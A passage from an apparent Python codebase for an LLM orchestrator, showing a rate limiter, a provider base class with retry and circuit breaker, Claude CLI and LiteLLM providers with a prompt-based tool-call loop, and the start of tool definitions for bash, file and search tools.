        limiter = RateLimiter(max_calls=60, period=60.0)
        
        await limiter.acquire()  # Blocks if rate exceeded
        do_something()
    """
    
    def __init__(
        self,
        max_calls: int = 60,
        period: float = 60.0,
        burst_allowance: int = 0,
    ):
        """
        Args:
            max_calls: Maximum calls allowed in period
            period: Time window in seconds
            burst_allowance: Extra calls allowed for bursts
        """
        self.max_calls = max_calls
        self.period = period
        self.burst_allowance = burst_allowance
        
        self._calls: deque = deque()
        self._lock = asyncio.Lock()
        
        self.stats = RateLimitStats()
    
    @property
    def effective_limit(self) -> int:
        """Effective rate limit including burst."""
        return self.max_calls + self.burst_allowance
    
    def _cleanup_old_calls(self, now: float):
        """Remove calls outside the window."""
        cutoff = now - self.period
        while self._calls and self._calls[0] < cutoff:
            self._calls.popleft()
    
    @property
    def current_usage(self) -> int:
        """Current number of calls in window."""
        self._cleanup_old_calls(time.time())
        return len(self._calls)
    
    @property
    def available_calls(self) -> int:
        """Number of calls available right now."""
        return max(0, self.effective_limit - self.current_usage)
    
    async def acquire(self, timeout: Optional[float] = None) -> bool:
        """
        Acquire permission to make a call.
        
        Blocks until rate limit allows the call.
        
        Args:
            timeout: Maximum time to wait (None = unlimited)
            
        Returns:
            True if acquired, False if timeout
        """
        start_time = time.time()
        
        async with self._lock:
            self.stats.total_requests += 1
            
            while True:
                now = time.time()
                self._cleanup_old_calls(now)
                
                # Check if we can proceed
                if len(self._calls) < self.effective_limit:
                    self._calls.append(now)
                    self.stats.allowed_requests += 1
                    return True
                
                # Calculate wait time
                oldest_call = self._calls[0]
                wait_time = oldest_call + self.period - now
                
                if wait_time <= 0:
                    continue
                
                # Check timeout
                if timeout is not None:
                    elapsed = now - start_time
                    if elapsed + wait_time > timeout:
                        self.stats.throttled_requests += 1
                        return False
                
                # Wait and retry
                self.stats.total_wait_time += wait_time
                
                # Release lock while waiting
                self._lock.release()
                try:
                    await asyncio.sleep(wait_time)
                finally:
                    await self._lock.acquire()
    
    async def try_acquire(self) -> bool:
        """
        Try to acquire without waiting.
        
        Returns:
            True if acquired, False if would need to wait
        """
        async with self._lock:
            self.stats.total_requests += 1
            now = time.time()
            self._cleanup_old_calls(now)
            
            if len(self._calls) < self.effective_limit:
                self._calls.append(now)
                self.stats.allowed_requests += 1
                return True
            
            self.stats.throttled_requests += 1
            return False
    
    def reset(self):
        """Reset rate limiter state."""
        self._calls.clear()
        self.stats = RateLimitStats()
    
    def __repr__(self) -> str:
        return (
            f"RateLimiter({self.current_usage}/{self.effective_limit} "
            f"per {self.period}s)"
        )


class MultiRateLimiter:
    """
    Multiple rate limiters combined.
    
    Useful for APIs with multiple rate limits:
    - 60 requests per minute
    - 1000 requests per hour
    
    Usage:
        limiter = MultiRateLimiter([
            RateLimiter(60, 60),     # per minute
            RateLimiter(1000, 3600), # per hour
        ])
        
        await limiter.acquire()
    """
    
    def __init__(self, limiters: list[RateLimiter]):
        self.limiters = limiters
    
    async def acquire(self, timeout: Optional[float] = None) -> bool:
        """
        Acquire from all limiters in order.

        Note: if a later limiter times out, slots already taken from
        earlier limiters are not released.
        """
        for limiter in self.limiters:
            if not await limiter.acquire(timeout):
                return False
        return True
    
    async def try_acquire(self) -> bool:
        """Try to acquire from all limiters without waiting."""
        for limiter in self.limiters:
            if not await limiter.try_acquire():
                return False
        return True

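The sliding-window check is easy to verify in isolation. Below is a standalone sketch of the same cleanup-then-count logic used by `try_acquire`; `now` is passed explicitly so the demo is deterministic (no sleeping), and the function name is an illustrative stand-in.

```python
from collections import deque

# Standalone sketch of the sliding-window logic: drop timestamps older than
# the window, then admit the call only if we are still under the limit.
def try_acquire(calls: deque, max_calls: int, period: float, now: float) -> bool:
    cutoff = now - period
    while calls and calls[0] < cutoff:
        calls.popleft()              # expire calls outside the window
    if len(calls) < max_calls:
        calls.append(now)
        return True
    return False

calls = deque()
print([try_acquire(calls, 3, 60.0, 100.0 + i) for i in range(5)])
# -> [True, True, True, False, False]
print(try_acquire(calls, 3, 60.0, 161.0))  # first call expired -> True
```

A `deque` is the natural structure here: timestamps arrive in order, so expiry is always `popleft` from the front in O(1).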
### orchestrator/providers/__init__.py

"""
LLM Providers.
"""

from .base import BaseProvider, ProviderResponse
from .claude_provider import ClaudeProvider
from .litellm_provider import LiteLLMProvider

__all__ = [
    "BaseProvider",
    "ProviderResponse",
    "ClaudeProvider",
    "LiteLLMProvider",
]

### orchestrator/providers/base.py

"""
Base provider with resilience features.

All providers inherit from this and get:
- Rate limiting
- Circuit breaker
- Retry with backoff
- Consistent response format
"""

from abc import ABC, abstractmethod
from dataclasses import dataclass, field
from datetime import datetime
from typing import Optional, Any, List

from ..core import (
    CircuitBreaker,
    RateLimiter,
    RetryConfig,
    retry_with_backoff,
)


@dataclass
class ToolCall:
    """A tool call from the LLM."""
    tool: str
    params: dict
    id: Optional[str] = None


@dataclass
class ToolResult:
    """Result of executing a tool."""
    tool: str
    success: bool
    output: str
    error: Optional[str] = None
    execution_time: float = 0.0


@dataclass
class UsageInfo:
    """Token usage information."""
    input_tokens: int = 0
    output_tokens: int = 0
    cache_read_tokens: int = 0
    cache_creation_tokens: int = 0
    
    @property
    def total_tokens(self) -> int:
        return self.input_tokens + self.output_tokens


@dataclass
class ProviderResponse:
    """Standardized response from any provider."""
    
    success: bool
    text: str
    provider: str
    model: str
    timestamp: str = field(default_factory=lambda: datetime.now().isoformat())
    error: Optional[str] = None
    usage: Optional[UsageInfo] = None
    tool_calls: List[ToolCall] = field(default_factory=list)
    tool_results: List[ToolResult] = field(default_factory=list)
    retries: int = 0
    raw_response: Optional[Any] = None
    session_id: Optional[str] = None
    
    @property
    def ok(self) -> bool:
        return self.success
    
    def to_dict(self) -> dict:
        """Convert to dictionary."""
        return {
            "success": self.success,
            "text": self.text,
            "provider": self.provider,
            "model": self.model,
            "timestamp": self.timestamp,
            "error": self.error,
            "usage": {
                "input_tokens": self.usage.input_tokens,
                "output_tokens": self.usage.output_tokens,
                "total_tokens": self.usage.total_tokens,
            } if self.usage else None,
            "retries": self.retries,
            "session_id": self.session_id,
        }


class BaseProvider(ABC):
    """
    Abstract base class for all LLM providers.
    
    Provides:
    - Rate limiting
    - Circuit breaker for fault tolerance
    - Retry with exponential backoff
    - Consistent response format
    
    Subclasses must implement:
    - name (property)
    - available_models (property)
    - _execute (method)
    """
    
    # Model aliases - override in subclasses
    MODEL_ALIASES: dict[str, str] = {}
    
    def __init__(
        self,
        model: str,
        timeout: float = 300.0,
        max_retries: int = 3,
        retry_delay: float = 1.0,
        rate_limit_per_minute: int = 60,
        enable_circuit_breaker: bool = True,
        circuit_breaker_threshold: int = 5,
        circuit_breaker_timeout: float = 30.0,
        **kwargs
    ):
        self.model = model
        self.timeout = timeout
        self.config = kwargs
        
        # Retry config
        self.retry_config = RetryConfig(
            max_retries=max_retries,
            base_delay=retry_delay,
            max_delay=60.0,
        )
        
        # Rate limiter
        self.rate_limiter = RateLimiter(
            max_calls=rate_limit_per_minute,
            period=60.0,
        )
        
        # Circuit breaker
        self.enable_circuit_breaker = enable_circuit_breaker
        self.circuit_breaker = CircuitBreaker(
            failure_threshold=circuit_breaker_threshold,
            timeout=circuit_breaker_timeout,
        ) if enable_circuit_breaker else None
    
    @property
    @abstractmethod
    def name(self) -> str:
        """Provider name (e.g., 'claude', 'litellm')."""
        pass
    
    @property
    @abstractmethod
    def available_models(self) -> list[str]:
        """List of available model names/aliases."""
        pass
    
    @property
    def supports_native_tools(self) -> bool:
        """Whether provider supports native function calling."""
        return False
    
    @property
    def supports_streaming(self) -> bool:
        """Whether provider supports streaming responses."""
        return False
    
    def resolve_model(self, model: str) -> str:
        """Resolve model alias to full model name."""
        return self.MODEL_ALIASES.get(model, model)
    
    @abstractmethod
    async def _execute(
        self,
        prompt: str,
        system_prompt: Optional[str] = None,
        tools: Optional[list[str]] = None,
        **kwargs
    ) -> ProviderResponse:
        """
        Internal execution method - implement in subclasses.
        
        This is the raw execution without retry/circuit breaker.
        """
        pass
    
    async def run(
        self,
        prompt: str,
        system_prompt: Optional[str] = None,
        **kwargs
    ) -> ProviderResponse:
        """
        Execute a prompt without tools.
        
        Includes rate limiting, retry, and circuit breaker.
        """
        return await self.run_with_tools(
            prompt=prompt,
            tools=[],
            system_prompt=system_prompt,
            **kwargs
        )
    
    async def run_with_tools(
        self,
        prompt: str,
        tools: list[str],
        system_prompt: Optional[str] = None,
        **kwargs
    ) -> ProviderResponse:
        """
        Execute a prompt with tools.
        
        Includes rate limiting, retry, and circuit breaker.
        """
        # Rate limiting
        await self.rate_limiter.acquire()
        
        # Define the execution function
        async def do_execute() -> ProviderResponse:
            return await self._execute(
                prompt=prompt,
                system_prompt=system_prompt,
                tools=tools,
                **kwargs
            )
        
        try:
            # With circuit breaker
            if self.circuit_breaker:
                async with self.circuit_breaker:
                    response, retries = await retry_with_backoff(
                        do_execute,
                        config=self.retry_config,
                    )
            else:
                response, retries = await retry_with_backoff(
                    do_execute,
                    config=self.retry_config,
                )
            
            response.retries = retries
            return response
            
        except Exception as e:
            return ProviderResponse(
                success=False,
                text="",
                provider=self.name,
                model=self.model,
                error=str(e),
            )
    
    async def health_check(self) -> bool:
        """Check if provider is healthy."""
        try:
            response = await self.run("Respond with only: OK")
            return response.success and "OK" in response.text.upper()
        except Exception:
            return False
    
    def __repr__(self) -> str:
        return f"{self.__class__.__name__}(model={self.model})"

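`run_with_tools` layers the resilience features in a fixed order: rate limiting first, then the circuit breaker, then retry with backoff around the raw `_execute`. The sketch below demonstrates only the innermost layer, a retry wrapper that returns a `(result, retries)` pair the way `retry_with_backoff` is used above; all names and delays here are illustrative stand-ins, not the orchestrator's API.

```python
import asyncio

# Standalone sketch of the innermost resilience layer: retry a coroutine
# with exponential backoff and report how many retries were needed.
async def with_retry(fn, max_retries=3, base_delay=0.01):
    last_exc = None
    for attempt in range(max_retries + 1):
        try:
            return await fn(), attempt   # attempt == number of retries used
        except Exception as exc:
            last_exc = exc
            await asyncio.sleep(base_delay * (2 ** attempt))  # backoff
    raise last_exc

async def main():
    calls = {"n": 0}

    async def flaky():
        calls["n"] += 1
        if calls["n"] < 3:
            raise RuntimeError("transient failure")
        return "ok"

    result, retries = await with_retry(flaky)
    print(result, retries)  # ok 2

asyncio.run(main())
```

The ordering matters: rate limiting before the breaker avoids burning a rate-limit slot on a call the breaker would reject, and retry sits innermost so each retry attempt still counts toward the breaker's failure tally.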
### orchestrator/providers/claude_provider.py

"""
Claude provider using Claude Code CLI.

This provider executes Claude via the CLI, handling:
- Proper JSON parsing
- Session management
- Tool execution
- Error handling
"""

import asyncio
import json
import shutil
import os
from typing import Optional, List, Any
from pathlib import Path

from .base import BaseProvider, ProviderResponse, UsageInfo, ToolCall


class ClaudeProviderError(Exception):
    """Base exception for Claude provider."""
    pass


class CLINotFoundError(ClaudeProviderError):
    """Claude CLI not found."""
    pass


class ExecutionError(ClaudeProviderError):
    """Error during execution."""
    pass


class ClaudeProvider(BaseProvider):
    """
    Provider that uses Claude Code CLI.
    
    Requires:
    - Claude Code CLI installed (`claude` command available)
    - Valid authentication (Pro/Max subscription or API key)
    
    Features:
    - Native tool support (Bash, Read, Write, etc.)
    - Session management
    - JSON output parsing
    - Autocompact for long conversations
    """
    
    MODEL_ALIASES = {
        # Friendly names
        "haiku": "claude-3-5-haiku-latest",
        "sonnet": "claude-sonnet-4-20250514",
        "opus": "claude-opus-4-20250514",
        # Semantic names
        "fast": "claude-3-5-haiku-latest",
        "default": "claude-sonnet-4-20250514",
        "smart": "claude-sonnet-4-20250514",
        "powerful": "claude-opus-4-20250514",
    }
    
    # Tools supported by Claude CLI
    NATIVE_TOOLS = [
        "Bash", "Read", "Write", "Edit",
        "Glob", "Grep", "WebFetch",
        "TodoRead", "TodoWrite",
    ]
    
    # Mapping from our tool names to Claude CLI tool names
    TOOL_NAME_MAP = {
        "bash": "Bash",
        "read": "Read", 
        "write": "Write",
        "edit": "Edit",
        "glob": "Glob",
        "grep": "Grep",
        "web_fetch": "WebFetch",
        "webfetch": "WebFetch",
    }
    
    def __init__(
        self,
        model: str = "sonnet",
        timeout: float = 300.0,
        cli_path: str = "claude",
        working_directory: Optional[str] = None,
        max_turns: int = 10,
        autocompact: bool = True,
        **kwargs
    ):
        """
        Args:
            model: Model to use (sonnet, opus, haiku, or full name)
            timeout: Execution timeout in seconds
            cli_path: Path to claude CLI
            working_directory: Working directory for execution
            max_turns: Maximum tool use turns
            autocompact: Enable automatic context compaction
        """
        super().__init__(model=model, timeout=timeout, **kwargs)
        
        self.cli_path = cli_path
        self.working_directory = working_directory or os.getcwd()
        self.max_turns = max_turns
        self.autocompact = autocompact
        
        # Verify CLI exists
        if not shutil.which(self.cli_path):
            raise CLINotFoundError(
                f"Claude CLI not found at '{self.cli_path}'. "
                "Install with: npm install -g @anthropic-ai/claude-code"
            )
    
    @property
    def name(self) -> str:
        return "claude"
    
    @property
    def available_models(self) -> list[str]:
        return list(self.MODEL_ALIASES.keys())
    
    @property
    def supports_native_tools(self) -> bool:
        return True
    
    def _map_tools(self, tools: List[str]) -> List[str]:
        """Map our tool names to Claude CLI tool names."""
        mapped = []
        for tool in tools:
            tool_lower = tool.lower()
            if tool_lower in self.TOOL_NAME_MAP:
                mapped.append(self.TOOL_NAME_MAP[tool_lower])
            elif tool in self.NATIVE_TOOLS:
                mapped.append(tool)
            # Skip non-native tools (http_request, ssh, etc.)
        return mapped
    
    def _build_command(
        self,
        prompt: str,
        system_prompt: Optional[str] = None,
        tools: Optional[List[str]] = None,
        session_id: Optional[str] = None,
        continue_session: bool = False,
    ) -> List[str]:
        """Build the CLI command."""
        cmd = [self.cli_path]
        
        # Prompt
        cmd.extend(["-p", prompt])
        
        # Output format
        cmd.extend(["--output-format", "json"])
        
        # Model
        resolved_model = self.resolve_model(self.model)
        cmd.extend(["--model", resolved_model])
        
        # System prompt
        if system_prompt:
            cmd.extend(["--system-prompt", system_prompt])
        
        # Tools
        if tools:
            native_tools = self._map_tools(tools)
            if native_tools:
                cmd.extend(["--allowedTools", ",".join(native_tools)])
        
        # Max turns
        cmd.extend(["--max-turns", str(self.max_turns)])
        
        # Session management
        if session_id:
            if continue_session:
                cmd.extend(["--continue", session_id])
            else:
                cmd.extend(["--session-id", session_id])
        
        return cmd
    
    def _parse_response(self, stdout: str, stderr: str, return_code: int) -> dict:
        """Parse the CLI response."""
        # Try to parse JSON
        try:
            # Handle potential multiple JSON objects (streaming artifacts)
            lines = stdout.strip().split('\n')
            
            # Find the last valid JSON object
            for line in reversed(lines):
                line = line.strip()
                if line.startswith('{'):
                    try:
                        return json.loads(line)
                    except json.JSONDecodeError:
                        continue
            
            # Try parsing the whole output
            return json.loads(stdout)
            
        except json.JSONDecodeError:
            # If JSON parsing fails, return raw output
            return {
                "result": stdout,
                "is_error": return_code != 0,
                "error": stderr if stderr else None,
            }
    
    def _extract_usage(self, response: dict) -> Optional[UsageInfo]:
        """Extract usage information from response."""
        usage_data = response.get("usage")
        if not usage_data:
            return None
        
        return UsageInfo(
            input_tokens=usage_data.get("input_tokens", 0),
            output_tokens=usage_data.get("output_tokens", 0),
            cache_read_tokens=usage_data.get("cache_read_input_tokens", 0),
            cache_creation_tokens=usage_data.get("cache_creation_input_tokens", 0),
        )
    
    async def _execute(
        self,
        prompt: str,
        system_prompt: Optional[str] = None,
        tools: Optional[List[str]] = None,
        session_id: Optional[str] = None,
        continue_session: bool = False,
        **kwargs
    ) -> ProviderResponse:
        """Execute the Claude CLI."""
        cmd = self._build_command(
            prompt=prompt,
            system_prompt=system_prompt,
            tools=tools or [],
            session_id=session_id,
            continue_session=continue_session,
        )
        
        try:
            process = await asyncio.create_subprocess_exec(
                *cmd,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
                cwd=self.working_directory,
            )
            
            stdout, stderr = await asyncio.wait_for(
                process.communicate(),
                timeout=self.timeout
            )
            
            stdout_str = stdout.decode("utf-8", errors="replace")
            stderr_str = stderr.decode("utf-8", errors="replace")
            
            # Parse response
            response_data = self._parse_response(
                stdout_str, stderr_str, process.returncode
            )
            
            # Check for errors
            is_error = response_data.get("is_error", False) or process.returncode != 0
            
            # Extract text
            text = response_data.get("result", "")
            if not text and "content" in response_data:
                # Handle different response formats
                content = response_data["content"]
                if isinstance(content, list):
                    text = "\n".join(
                        c.get("text", "") for c in content 
                        if c.get("type") == "text"
                    )
                elif isinstance(content, str):
                    text = content
            
            # Extract error
            error = None
            if is_error:
                error = response_data.get("error") or stderr_str or "Unknown error"
            
            return ProviderResponse(
                success=not is_error,
                text=text,
                provider=self.name,
                model=self.model,
                error=error,
                usage=self._extract_usage(response_data),
                session_id=response_data.get("session_id"),
                raw_response=response_data,
            )
            
        except asyncio.TimeoutError:
            raise ExecutionError(f"Timeout after {self.timeout}s")
        except FileNotFoundError:
            raise CLINotFoundError(f"Claude CLI not found: {self.cli_path}")
        except Exception as e:
            raise ExecutionError(f"Execution failed: {e}")
    
    async def run_with_session(
        self,
        prompt: str,
        session_id: str,
        continue_session: bool = True,
        **kwargs
    ) -> ProviderResponse:
        """Run with explicit session management."""
        return await self.run_with_tools(
            prompt=prompt,
            tools=kwargs.pop("tools", []),
            system_prompt=kwargs.pop("system_prompt", None),
            session_id=session_id,
            continue_session=continue_session,
            **kwargs
        )
    
    async def health_check(self) -> bool:
        """Verify Claude CLI is working."""
        try:
            # Simple test command
            cmd = [self.cli_path, "-p", "Say OK", "--output-format", "json", "--max-turns", "1"]
            
            process = await asyncio.create_subprocess_exec(
                *cmd,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
            )
            
            stdout, _ = await asyncio.wait_for(
                process.communicate(),
                timeout=30.0
            )
            
            if process.returncode == 0:
                return True
            
            return False
            
        except Exception:
            return False

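For reference, this is the shape of the argv list `_build_command` assembles for a fresh session with two native tools enabled. Flag names are the ones used in this module; the prompt and tool choice are made-up examples, and the model ID is the one `MODEL_ALIASES` maps `"sonnet"` to.

```python
# Illustrative reconstruction of the argv list _build_command produces.
# The prompt here is a made-up example; flags are as defined in this module.
cmd = [
    "claude",
    "-p", "List the Python files here",
    "--output-format", "json",
    "--model", "claude-sonnet-4-20250514",   # resolved from the "sonnet" alias
    "--allowedTools", "Bash,Glob",           # mapped via TOOL_NAME_MAP
    "--max-turns", "10",
]
print(" ".join(cmd))
```

Passing this list to `asyncio.create_subprocess_exec(*cmd, ...)` avoids shell quoting issues entirely, which is why the provider builds a list rather than a command string.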
### orchestrator/providers/litellm_provider.py

"""
Universal LLM provider using LiteLLM.

Supports 100+ models through a unified interface:
- OpenAI (GPT-4, o1)
- Google (Gemini)
- Anthropic (via API)
- Mistral
- Ollama (local)
- Groq
- Together
- And many more...
"""

import asyncio
import json
import re
from typing import Optional, List, Any

from .base import BaseProvider, ProviderResponse, UsageInfo, ToolCall, ToolResult


class LiteLLMProvider(BaseProvider):
    """
    Universal provider using LiteLLM.
    
    Requires:
    - pip install litellm
    - Appropriate API keys in environment
    
    Features:
    - 100+ model support
    - Unified API
    - Tool execution loop
    - Cost tracking
    """
    
    MODEL_ALIASES = {
        # OpenAI
        "gpt4": "gpt-4",
        "gpt4o": "gpt-4o",
        "gpt4-turbo": "gpt-4-turbo",
        "gpt4o-mini": "gpt-4o-mini",
        "o1": "o1-preview",
        "o1-mini": "o1-mini",
        "o3-mini": "o3-mini",
        
        # Google Gemini
        "gemini": "gemini/gemini-1.5-pro",
        "gemini-pro": "gemini/gemini-1.5-pro",
        "gemini-flash": "gemini/gemini-1.5-flash",
        "gemini-2": "gemini/gemini-2.0-flash",
        
        # Anthropic (via API, not CLI)
        "claude-api": "claude-3-5-sonnet-20241022",
        "claude-opus-api": "claude-3-opus-20240229",
        
        # Mistral
        "mistral": "mistral/mistral-large-latest",
        "mistral-small": "mistral/mistral-small-latest",
        "mixtral": "mistral/open-mixtral-8x22b",
        "codestral": "mistral/codestral-latest",
        
        # Ollama (local)
        "llama3": "ollama/llama3",
        "llama3.1": "ollama/llama3.1",
        "llama3.2": "ollama/llama3.2",
        "codellama": "ollama/codellama",
        "mixtral-local": "ollama/mixtral",
        "qwen": "ollama/qwen2.5",
        "deepseek": "ollama/deepseek-r1",
        
        # Groq (fast inference)
        "groq-llama": "groq/llama-3.3-70b-versatile",
        "groq-mixtral": "groq/mixtral-8x7b-32768",
        
        # Together
        "together-llama": "together_ai/meta-llama/Llama-3-70b-chat-hf",
        
        # DeepSeek
        "deepseek-chat": "deepseek/deepseek-chat",
        "deepseek-coder": "deepseek/deepseek-coder",
    }
    
    # Models that support native function calling
    FUNCTION_CALLING_MODELS = {
        "gpt-4", "gpt-4o", "gpt-4-turbo", "gpt-4o-mini",
        "claude-3", "gemini",
    }
    
    def __init__(
        self,
        model: str = "gpt-4o",
        timeout: float = 300.0,
        api_key: Optional[str] = None,
        api_base: Optional[str] = None,
        max_tool_iterations: int = 10,
        temperature: float = 0.7,
        **kwargs
    ):
        """
        Args:
            model: Model name or alias
            timeout: Request timeout
            api_key: Override API key
            api_base: Override API base URL
            max_tool_iterations: Max tool use loops
            temperature: Sampling temperature
        """
        super().__init__(model=model, timeout=timeout, **kwargs)
        
        self.api_key = api_key
        self.api_base = api_base
        self.max_tool_iterations = max_tool_iterations
        self.temperature = temperature
        
        self._litellm = None
    
    def _get_litellm(self):
        """Lazy load litellm."""
        if self._litellm is None:
            try:
                import litellm
                litellm.set_verbose = False
                self._litellm = litellm
            except ImportError:
                raise ImportError(
                    "LiteLLM not installed. Run: pip install litellm"
                )
        return self._litellm
    
    @property
    def name(self) -> str:
        return "litellm"
    
    @property
    def available_models(self) -> list[str]:
        return list(self.MODEL_ALIASES.keys())
    
    @property
    def supports_native_tools(self) -> bool:
        """Check if the current model supports function calling.
        
        Substring match: "gpt-4o" also covers dated variants such as
        "gpt-4o-2024-08-06", and "claude-3" covers any claude-3-* model.
        Models that match nothing fall back to the prompt-based tool protocol.
        """
        resolved = self.resolve_model(self.model)
        return any(fc in resolved for fc in self.FUNCTION_CALLING_MODELS)
    
    def _build_tools_prompt(self, tools: List[str]) -> str:
        """Build a prompt section describing available tools."""
        if not tools:
            return ""
        
        prompt = """
## Available Tools

You can use tools by responding with a JSON block like this:

```tool
{
    "tool": "tool_name",
    "params": {
        "param1": "value1"
    }
}
```

Available tools:

"""
        
        tool_descriptions = {
            "bash": "Execute a bash command. Params: command (required), working_dir (optional)",
            "read": "Read a file. Params: path (required), encoding (optional)",
            "write": "Write to a file. Params: path (required), content (required), append (optional bool)",
            "glob": "Find files by pattern. Params: pattern (required), base_dir (optional)",
            "grep": "Search text in files. Params: pattern (required), path (required), recursive (optional bool)",
            "http_request": "Make HTTP request. Params: url (required), method (optional), headers (optional), body (optional)",
            "ssh": "Execute remote command. Params: host (required), command (required), user (optional), key_path (optional)",
            "list_dir": "List directory contents. Params: path (required), recursive (optional bool)",
        }
        
        for tool in tools:
            if tool in tool_descriptions:
                prompt += f"- **{tool}**: {tool_descriptions[tool]}\n"
        
        prompt += "\nAfter using a tool, you'll receive the result and can continue.\n"
        
        return prompt

    def _parse_tool_calls(self, text: str) -> List[ToolCall]:
        """Parse tool calls from response text."""
        calls = []
        
        # Pattern: ```tool { ... } ```
        pattern1 = r'```tool\s*\n?(.*?)\n?```'
        for match in re.findall(pattern1, text, re.DOTALL):
            try:
                data = json.loads(match.strip())
                if "tool" in data:
                    calls.append(ToolCall(
                        tool=data["tool"],
                        params=data.get("params", {}),
                    ))
            except json.JSONDecodeError:
                continue
        
        # Pattern: ```json { "tool": ... } ```
        pattern2 = r'```json\s*\n?(.*?)\n?```'
        for match in re.findall(pattern2, text, re.DOTALL):
            try:
                data = json.loads(match.strip())
                if "tool" in data:
                    calls.append(ToolCall(
                        tool=data["tool"],
                        params=data.get("params", {}),
                    ))
            except json.JSONDecodeError:
                continue
        
        return calls
    
    async def _call_llm(
        self,
        messages: List[dict],
        max_tokens: Optional[int] = None,
    ) -> dict:
        """Make a single LLM call."""
        litellm = self._get_litellm()
        
        resolved_model = self.resolve_model(self.model)
        
        kwargs = {
            "model": resolved_model,
            "messages": messages,
            "temperature": self.temperature,
            "timeout": self.timeout,
        }
        
        if max_tokens:
            kwargs["max_tokens"] = max_tokens
        
        if self.api_key:
            kwargs["api_key"] = self.api_key
        
        if self.api_base:
            kwargs["api_base"] = self.api_base
        
        return await litellm.acompletion(**kwargs)
    
    async def _execute(
        self,
        prompt: str,
        system_prompt: Optional[str] = None,
        tools: Optional[List[str]] = None,
        tool_executor: Optional[Any] = None,
        max_tokens: Optional[int] = None,
        **kwargs
    ) -> ProviderResponse:
        """Execute with optional tool loop."""
        tools = tools or []
        resolved_model = self.resolve_model(self.model)
        
        # Build system prompt with tools
        full_system = system_prompt or ""
        if tools:
            tools_prompt = self._build_tools_prompt(tools)
            full_system = f"{full_system}\n\n{tools_prompt}" if full_system else tools_prompt
        
        # Build messages
        messages = []
        if full_system:
            messages.append({"role": "system", "content": full_system})
        messages.append({"role": "user", "content": prompt})
        
        all_tool_results: List[ToolResult] = []
        total_usage = UsageInfo()
        text = ""
        
        # Tool execution loop
        for iteration in range(self.max_tool_iterations):
            try:
                response = await self._call_llm(messages, max_tokens)
            except Exception as e:
                return ProviderResponse(
                    success=False,
                    text="",
                    provider=self.name,
                    model=resolved_model,
                    error=f"LiteLLM error: {e}",
                )
            
            # Extract text
            text = response.choices[0].message.content or ""
            
            # Update usage
            if hasattr(response, 'usage') and response.usage:
                total_usage.input_tokens += getattr(response.usage, 'prompt_tokens', 0)
                total_usage.output_tokens += getattr(response.usage, 'completion_tokens', 0)
            
            # Check for tool calls
            if tools and tool_executor:
                tool_calls = self._parse_tool_calls(text)
                
                if tool_calls:
                    # Execute tools
                    results_text_parts = []
                    
                    for call in tool_calls:
                        result = await tool_executor.execute(call.tool, call.params)
                        all_tool_results.append(ToolResult(
                            tool=call.tool,
                            success=result.success,
                            output=result.output,
                            error=result.error,
                            execution_time=result.execution_time,
                        ))
                        
                        status = "✅" if result.success else "❌"
                        output = result.output if result.success else result.error
                        results_text_parts.append(
                            f"**{call.tool}** {status}\n{output}"
                        )
                    
                    # Add to conversation and continue
                    results_text = "\n\n".join(results_text_parts)
                    messages.append({"role": "assistant", "content": text})
                    messages.append({"role": "user", "content": f"Tool results:\n\n{results_text}\n\nContinue."})
                    continue
            
            # No tool calls, we're done
            break
        
        return ProviderResponse(
            success=True,
            text=text,
            provider=self.name,
            model=resolved_model,
            usage=total_usage if total_usage.total_tokens > 0 else None,
            tool_results=[
                ToolResult(
                    tool=r.tool,
                    success=r.success,
                    output=r.output,
                    error=r.error,
                )
                for r in all_tool_results
            ],
        )
```
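The prompt-based tool protocol above can be exercised in isolation. Below is a minimal, self-contained sketch of the same fenced-JSON parse (the backtick fence is assembled at runtime only so the example nests inside this document; the sample model reply is invented):

```python
import json
import re

FENCE = "`" * 3  # literal triple backtick, built dynamically so it nests in this doc

def parse_tool_calls(text: str) -> list[dict]:
    """Extract {"tool": ..., "params": ...} objects from fenced tool blocks."""
    calls = []
    pattern = FENCE + r"tool\s*\n?(.*?)\n?" + FENCE
    for match in re.findall(pattern, text, re.DOTALL):
        try:
            data = json.loads(match.strip())
        except json.JSONDecodeError:
            continue  # malformed JSON: skip it, just like the provider does
        if "tool" in data:
            calls.append({"tool": data["tool"], "params": data.get("params", {})})
    return calls

# A reply a non-function-calling model might produce:
reply = FENCE + 'tool\n{"tool": "read", "params": {"path": "notes.txt"}}\n' + FENCE
calls = parse_tool_calls(reply)
```

Each parsed call is then routed through the tool executor, and the result is appended to the conversation before the next loop iteration.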

---

## orchestrator/tools/\_\_init\_\_.py

```python
"""
Tool definitions and executor.
"""

from .definitions import TOOL_DEFINITIONS, get_tool_schema, get_tools_prompt
from .executor import ToolExecutor, ToolResult, SecurityValidator

__all__ = [
    "TOOL_DEFINITIONS",
    "get_tool_schema", 
    "get_tools_prompt",
    "ToolExecutor",
    "ToolResult",
    "SecurityValidator",
]

```

---

## orchestrator/tools/definitions.py

```python

"""
Tool definitions in standard format.

Compatible with OpenAI function calling and other providers.
"""

from typing import Any, List, Dict


TOOL_DEFINITIONS: Dict[str, dict] = {
    "bash": {
        "name": "bash",
        "description": "Execute a bash command on the system. Use for running scripts, system commands, git, etc.",
        "parameters": {
            "type": "object",
            "properties": {
                "command": {
                    "type": "string",
                    "description": "The bash command to execute"
                },
                "working_dir": {
                    "type": "string",
                    "description": "Optional working directory"
                }
            },
            "required": ["command"]
        }
    },
    
    "read": {
        "name": "read",
        "description": "Read the contents of a file. Returns the text content.",
        "parameters": {
            "type": "object",
            "properties": {
                "path": {
                    "type": "string",
                    "description": "Path to the file to read"
                },
                "encoding": {
                    "type": "string",
                    "description": "File encoding (default: utf-8)"
                }
            },
            "required": ["path"]
        }
    },
    
    "write": {
        "name": "write",
        "description": "Write content to a file. Creates the file if it doesn't exist, overwrites if it does.",
        "parameters": {
            "type": "object",
            "properties": {
                "path": {
                    "type": "string",
                    "description": "Path to the file to write"
                },
                "content": {
                    "type": "string",
                    "description": "Content to write to the file"
                },
                "append": {
                    "type": "boolean",
                    "description": "If true, append instead of overwrite"
                }
            },
            "required": ["path", "content"]
        }
    },
    
    "glob": {
        "name": "glob",
        "description": "Find files using glob patterns. E.g., '**/*.py' finds all Python files.",
        "parameters": {
            "type": "object",
            "properties": {
                "pattern": {
                    "type": "string",
                    "description": "Glob pattern to search for files"
                },
                "base_dir": {
                    "type": "string",
                    "description": "Base directory for the search"
                }
            },
            "required": ["pattern"]
        }
    },
    
    "grep": {
        "name": "grep",
        "description": "Search for text in files using regular expressions.",
        "parameters": {
            "type": "object",
            "properties": {
                "pattern": {
                    "type": "string",
                    "description": "Regex pattern to search for"
                },
                "path": {
